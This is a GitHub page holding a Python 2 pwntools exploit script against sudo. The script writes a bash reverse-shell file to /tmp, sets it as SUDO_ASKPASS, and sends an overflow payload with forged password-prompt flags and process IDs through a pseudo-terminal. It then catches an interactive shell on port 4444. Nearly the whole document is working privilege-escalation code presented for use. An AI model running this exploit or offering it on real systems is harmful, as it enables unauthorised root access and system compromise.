Skip to content
Permalink
master
Switch branches/tags
Go to file
 
 
Cannot retrieve contributors at this time
#!/usr/bin/env python2
import sys,os
from pwn import *
TARGET=os.path.realpath("/usr/bin/sudo")
def setFlags(flags):
tgetpassFlags = {
"TGP_NOECHO":0x00,
"TGP_ECHO":0x01,
"TGP_STDIN":0x02,
"TGP_ASKPASS":0x04,
"TGP_MASK":0x08,
"TGP_NOECHO_TRY":0x10
}
flags = flags.split("|")
retval = 0
for i in flags:
retval |= tgetpassFlags[i]
return retval
def getFlags(intFlag):
tgetpassFlags = {
0x00:"TGP_NOECHO",
0x01:"TGP_ECHO",
0x02:"TGP_STDIN",
0x04:"TGP_ASKPASS",
0x08:"TGP_MASK",
0x10:"TGP_NOECHO_TRY"
}
if intFlag == 0:
return tgetpassFlags[intFlag]
flag = ""
mask=1
while mask <= intFlag:
if intFlag & mask == mask:
flag += tgetpassFlags[mask] + "|"
mask <<= 1
return flag[:-1]
if __name__ == "__main__":
with open("/tmp/rs.sh", "w") as file:
file.write("""#!/bin/bash
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
""")
os.chmod("/tmp/rs.sh", 0o777)
r=listen(4444)
mfd, sfd = os.openpty()
fd = os.open(os.ttyname(sfd), os.O_RDONLY)
p = process([TARGET,"-S", "id"],env={'SUDO_ASKPASS':"/tmp/rs.sh"}, stdin=fd)
payload = "\x00\x15"*548
payload += p64(setFlags("TGP_STDIN|TGP_ASKPASS"))
payload += "\x00\x15"*(20)
pid = p.pid
ppid = util.proc.parent(pid)
payload += p32(pid)
payload += p32(ppid)
payload += p32(pid)
payload += p32(pid)
payload += p32(pid)
payload += "\x00"*3
payload += "\n"
os.write(mfd, payload)
r.wait_for_connection()
r.interactive()
sys.exit(0)